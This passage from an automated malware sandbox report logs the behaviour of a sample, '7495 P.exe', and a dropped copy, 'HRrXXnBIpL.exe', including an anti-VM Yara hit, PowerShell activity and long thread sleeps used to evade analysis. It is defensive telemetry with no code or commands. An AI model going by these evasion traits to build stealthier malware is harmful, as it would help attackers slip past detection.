Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match	File source: Process Memory Space: 7495 P.exe PID: 5272, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: HRrXXnBIpL.exe PID: 8888, type: MEMORYSTR

Source: C:\Users\user\Desktop\7495 P.exe	Memory allocated: 1190000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Memory allocated: 2E80000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Memory allocated: 2D20000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Memory allocated: 8630000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Memory allocated: 9630000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Memory allocated: 9810000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Memory allocated: A810000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Memory allocated: 30A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Memory allocated: 3280000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Memory allocated: 5280000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Memory allocated: 890000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Memory allocated: 2530000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Memory allocated: 2340000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Memory allocated: 7820000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Memory allocated: 8820000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Memory allocated: 89F0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Memory allocated: 99F0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Memory allocated: 1760000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Memory allocated: 3110000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Memory allocated: 5110000 memory reserve \| memory write watch

Source: C:\Users\user\Desktop\7495 P.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Thread delayed: delay time: 599858	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Thread delayed: delay time: 599737	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Thread delayed: delay time: 599590	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Thread delayed: delay time: 599474	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Thread delayed: delay time: 599343	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Thread delayed: delay time: 599238	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Thread delayed: delay time: 599111	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Thread delayed: delay time: 598974	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Thread delayed: delay time: 598833	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Thread delayed: delay time: 598709	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Thread delayed: delay time: 598571	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Thread delayed: delay time: 598449	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Thread delayed: delay time: 598315	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Thread delayed: delay time: 598190	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Thread delayed: delay time: 598049	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Thread delayed: delay time: 597896	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Thread delayed: delay time: 597747	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Thread delayed: delay time: 597626	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Thread delayed: delay time: 597505	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Thread delayed: delay time: 597381	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Thread delayed: delay time: 597243	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Thread delayed: delay time: 597142	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Thread delayed: delay time: 597011	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Thread delayed: delay time: 596895	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Thread delayed: delay time: 596757	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Thread delayed: delay time: 596641	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Thread delayed: delay time: 596510	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Thread delayed: delay time: 596410	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Thread delayed: delay time: 596278	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Thread delayed: delay time: 596152	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Thread delayed: delay time: 596041	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Thread delayed: delay time: 595925	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Thread delayed: delay time: 595793	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Thread delayed: delay time: 595693	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Thread delayed: delay time: 595562	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Thread delayed: delay time: 595446	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Thread delayed: delay time: 595321	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Thread delayed: delay time: 595207	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Thread delayed: delay time: 595045	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Thread delayed: delay time: 594904	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Thread delayed: delay time: 594730	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Thread delayed: delay time: 594624	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Thread delayed: delay time: 594522	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Thread delayed: delay time: 594411	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Thread delayed: delay time: 594280	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Thread delayed: delay time: 594164	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Thread delayed: delay time: 594064	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Thread delayed: delay time: 593926	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Thread delayed: delay time: 593794	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Thread delayed: delay time: 593678	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Thread delayed: delay time: 593547	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Thread delayed: delay time: 599877
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Thread delayed: delay time: 599761
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Thread delayed: delay time: 599645
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Thread delayed: delay time: 599531
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Thread delayed: delay time: 599399
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Thread delayed: delay time: 599283
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Thread delayed: delay time: 599167
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Thread delayed: delay time: 599045
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Thread delayed: delay time: 598929
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Thread delayed: delay time: 598828
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Thread delayed: delay time: 598542
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Thread delayed: delay time: 598424
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Thread delayed: delay time: 598250
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Thread delayed: delay time: 598036
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Thread delayed: delay time: 597917
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Thread delayed: delay time: 597801
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Thread delayed: delay time: 597685
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Thread delayed: delay time: 597569
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Thread delayed: delay time: 597469
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Thread delayed: delay time: 597347
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Thread delayed: delay time: 597231
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Thread delayed: delay time: 597115
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Thread delayed: delay time: 596999
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Thread delayed: delay time: 596883
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Thread delayed: delay time: 596767
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Thread delayed: delay time: 596644
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Thread delayed: delay time: 596529
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Thread delayed: delay time: 596413
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Thread delayed: delay time: 596307
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Thread delayed: delay time: 596196
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Thread delayed: delay time: 596081
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Thread delayed: delay time: 595938
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Thread delayed: delay time: 595766
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Thread delayed: delay time: 595351
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Thread delayed: delay time: 595033
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Thread delayed: delay time: 594909
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Thread delayed: delay time: 594787
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Thread delayed: delay time: 594659
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Thread delayed: delay time: 594534
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Thread delayed: delay time: 594409
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Thread delayed: delay time: 593378
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Thread delayed: delay time: 593253
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Thread delayed: delay time: 593128
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Thread delayed: delay time: 592944
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Thread delayed: delay time: 592708
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Thread delayed: delay time: 592456
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Thread delayed: delay time: 592170
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Thread delayed: delay time: 592025
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Thread delayed: delay time: 591914
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Thread delayed: delay time: 591799
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Thread delayed: delay time: 591675
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Thread delayed: delay time: 591564

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 9098	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 611	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 9046	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 600	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Window / User API: threadDelayed 5257	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe	Window / User API: threadDelayed 4552	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Window / User API: threadDelayed 3492
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Window / User API: threadDelayed 6334

Source: C:\Users\user\Desktop\7495 P.exe TID: 6788	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8624	Thread sleep count: 9098 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8604	Thread sleep count: 611 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8820	Thread sleep time: -9223372036854770s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8848	Thread sleep time: -4611686018427385s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe TID: 8948	Thread sleep count: 37 > 30	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe TID: 8948	Thread sleep time: -34126476536362649s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe TID: 8948	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe TID: 8996	Thread sleep count: 5257 > 30	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe TID: 8948	Thread sleep time: -599858s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe TID: 8996	Thread sleep count: 4552 > 30	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe TID: 8948	Thread sleep time: -599737s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe TID: 8948	Thread sleep time: -599590s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe TID: 8948	Thread sleep time: -599474s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe TID: 8948	Thread sleep time: -599343s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe TID: 8948	Thread sleep time: -599238s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe TID: 8948	Thread sleep time: -599111s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe TID: 8948	Thread sleep time: -598974s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe TID: 8948	Thread sleep time: -598833s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe TID: 8948	Thread sleep time: -598709s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe TID: 8948	Thread sleep time: -598571s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe TID: 8948	Thread sleep time: -598449s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe TID: 8948	Thread sleep time: -598315s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe TID: 8948	Thread sleep time: -598190s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe TID: 8948	Thread sleep time: -598049s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe TID: 8948	Thread sleep time: -597896s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe TID: 8948	Thread sleep time: -597747s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe TID: 8948	Thread sleep time: -597626s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe TID: 8948	Thread sleep time: -597505s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe TID: 8948	Thread sleep time: -597381s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe TID: 8948	Thread sleep time: -597243s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe TID: 8948	Thread sleep time: -597142s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe TID: 8948	Thread sleep time: -597011s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe TID: 8948	Thread sleep time: -596895s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe TID: 8948	Thread sleep time: -596757s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe TID: 8948	Thread sleep time: -596641s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe TID: 8948	Thread sleep time: -596510s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe TID: 8948	Thread sleep time: -596410s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe TID: 8948	Thread sleep time: -596278s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe TID: 8948	Thread sleep time: -596152s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe TID: 8948	Thread sleep time: -596041s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe TID: 8948	Thread sleep time: -595925s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe TID: 8948	Thread sleep time: -595793s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe TID: 8948	Thread sleep time: -595693s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe TID: 8948	Thread sleep time: -595562s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe TID: 8948	Thread sleep time: -595446s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe TID: 8948	Thread sleep time: -595321s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe TID: 8948	Thread sleep time: -595207s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe TID: 8948	Thread sleep time: -595045s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe TID: 8948	Thread sleep time: -594904s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe TID: 8948	Thread sleep time: -594730s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe TID: 8948	Thread sleep time: -594624s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe TID: 8948	Thread sleep time: -594522s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe TID: 8948	Thread sleep time: -594411s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe TID: 8948	Thread sleep time: -594280s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe TID: 8948	Thread sleep time: -594164s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe TID: 8948	Thread sleep time: -594064s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe TID: 8948	Thread sleep time: -593926s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe TID: 8948	Thread sleep time: -593794s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe TID: 8948	Thread sleep time: -593678s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\7495 P.exe TID: 8948	Thread sleep time: -593547s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe TID: 8920	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe TID: 9192	Thread sleep count: 38 > 30
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe TID: 9192	Thread sleep time: -35048813740048126s >= -30000s
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe TID: 9192	Thread sleep time: -600000s >= -30000s
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe TID: 9192	Thread sleep time: -599877s >= -30000s
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe TID: 9196	Thread sleep count: 3492 > 30
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe TID: 9196	Thread sleep count: 6334 > 30
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe TID: 9192	Thread sleep time: -599761s >= -30000s
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe TID: 9192	Thread sleep time: -599645s >= -30000s
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe TID: 9192	Thread sleep time: -599531s >= -30000s
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe TID: 9192	Thread sleep time: -599399s >= -30000s
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe TID: 9192	Thread sleep time: -599283s >= -30000s
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe TID: 9192	Thread sleep time: -599167s >= -30000s
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe TID: 9192	Thread sleep time: -599045s >= -30000s
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe TID: 9192	Thread sleep time: -598929s >= -30000s
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe TID: 9192	Thread sleep time: -598828s >= -30000s
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe TID: 9192	Thread sleep time: -598542s >= -30000s
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe TID: 9192	Thread sleep time: -598424s >= -30000s
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe TID: 9192	Thread sleep time: -598250s >= -30000s
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe TID: 9192	Thread sleep time: -598036s >= -30000s
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe TID: 9192	Thread sleep time: -597917s >= -30000s
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe TID: 9192	Thread sleep time: -597801s >= -30000s
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe TID: 9192	Thread sleep time: -597685s >= -30000s
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe TID: 9192	Thread sleep time: -597569s >= -30000s
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe TID: 9192	Thread sleep time: -597469s >= -30000s
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe TID: 9192	Thread sleep time: -597347s >= -30000s
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe TID: 9192	Thread sleep time: -597231s >= -30000s
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe TID: 9192	Thread sleep time: -597115s >= -30000s
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe TID: 9192	Thread sleep time: -596999s >= -30000s
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe TID: 9192	Thread sleep time: -596883s >= -30000s
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe TID: 9192	Thread sleep time: -596767s >= -30000s
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe TID: 9192	Thread sleep time: -596644s >= -30000s
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe TID: 9192	Thread sleep time: -596529s >= -30000s
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe TID: 9192	Thread sleep time: -596413s >= -30000s
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe TID: 9192	Thread sleep time: -596307s >= -30000s
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe TID: 9192	Thread sleep time: -596196s >= -30000s
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe TID: 9192	Thread sleep time: -596081s >= -30000s
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe TID: 9192	Thread sleep time: -595938s >= -30000s
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe TID: 9192	Thread sleep time: -595766s >= -30000s
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe TID: 9192	Thread sleep time: -595351s >= -30000s
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe TID: 9192	Thread sleep time: -595033s >= -30000s
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe TID: 9192	Thread sleep time: -594909s >= -30000s
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe TID: 9192	Thread sleep time: -594787s >= -30000s
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe TID: 9192	Thread sleep time: -594659s >= -30000s
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe TID: 9192	Thread sleep time: -594534s >= -30000s
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe TID: 9192	Thread sleep time: -594409s >= -30000s
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe TID: 9192	Thread sleep time: -593378s >= -30000s
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe TID: 9192	Thread sleep time: -593253s >= -30000s
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe TID: 9192	Thread sleep time: -593128s >= -30000s
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe TID: 9192	Thread sleep time: -592944s >= -30000s
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe TID: 9192	Thread sleep time: -592708s >= -30000s
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe TID: 9192	Thread sleep time: -592456s >= -30000s
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe TID: 9192	Thread sleep time: -592170s >= -30000s
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe TID: 9192	Thread sleep time: -592025s >= -30000s
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe TID: 9192	Thread sleep time: -591914s >= -30000s
